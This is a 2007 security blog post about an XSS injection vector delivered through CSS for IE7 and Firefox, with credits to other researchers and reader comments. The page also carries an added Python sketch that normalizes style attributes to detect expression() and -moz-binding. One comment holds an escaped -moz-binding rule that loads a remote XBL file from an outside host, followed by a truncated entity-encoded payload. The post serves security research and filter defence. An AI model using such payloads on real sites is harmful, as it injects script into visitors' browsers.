Ultimate XSS CSS injection

Monday, 26 November 2007

Here’s a final XSS CSS vector which works on IE7 and Firefox. The IE7 vector was based on the brilliant work of Martin, which I modified slightly, and I found that IE will also accept HTML entities in CSS styles.

Credits update

The expression part of this technique was first demonstrated by Dan on the slackers forums. Nice one Dan, sorry about missing you from the credits.

Please use my tool Hackvertor if you need to decode the IE vector, as it will provide you with all the necessary conversions. Please note the vector has been broken up onto multiple lines for viewing purposes; remove the line breaks when testing the vector.
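For filter authors, the consequence of the two encodings seen on this page (HTML entities accepted inside style values, and CSS backslash escapes as in the property name quoted in the comments below) is that a style attribute has to be normalized before it is checked. The following Python sketch is an added example, not code from the original post or from Hackvertor; the function names and the sample strings used to exercise it are constructed for illustration.

```python
import html
import re

# CSS escape: backslash + 1-6 hex digits (plus one optional whitespace),
# or backslash + any other single character, which stands for itself.
_CSS_ESCAPE = re.compile(r"\\(?:([0-9a-fA-F]{1,6})[ \t\r\n\f]?|(.))", re.DOTALL)

# Constructs named on this page: IE's expression() and Firefox's -moz-binding.
_RISKY = {
    "expression": re.compile(r"expression\s*\("),
    "-moz-binding": re.compile(r"-moz-binding\s*:"),
}


def _unescape_css(match):
    hex_digits, literal = match.groups()
    if hex_digits is None:
        # An escaped newline is a line continuation and yields nothing.
        return "" if literal in "\r\n\f" else literal
    code_point = int(hex_digits, 16)
    # Zero, surrogates and out-of-range values map to U+FFFD.
    if code_point == 0 or code_point > 0x10FFFF or 0xD800 <= code_point <= 0xDFFF:
        return "\ufffd"
    return chr(code_point)


def normalize_style(raw_attr):
    """Decode the HTML layer, then the CSS layer, then lowercase."""
    text = html.unescape(raw_attr)               # entities, with or without ';'
    text = _CSS_ESCAPE.sub(_unescape_css, text)  # backslash escapes
    return text.lower()


def risky_constructs(raw_attr):
    """Sorted names of risky constructs present after normalization."""
    normalized = normalize_style(raw_attr)
    return sorted(name for name, rx in _RISKY.items() if rx.search(normalized))
```

A filter that matches keywords on the raw attribute text sees none of these names; an allowlist of permitted properties applied to the normalized text is the more robust design, with this check as a backstop.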

Many thanks for the credit for the window.r trick. I hope I didn’t sound like I was specifically asking for credit on slackers - I was just trying to find out if I had come across the same trick as someone else or if it was an original idea. Nonetheless, I really appreciate the mention!

And damn, is that fine or what?! Nice work with that injection. A beautiful thing…

Thanks for the answer. Is it possible to use this XSS through a CSS file? What I’ve tried to do is to insert <link href="hxxp://wwwexample.com/css/xss.css"> and then <div class="somename" style="" id="inject">test</div> in HTML and the xss.css should look like <<< .sometext {
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);&#x78&#…&#x31&#x3B&#x27&#x29 : 1);
} >>>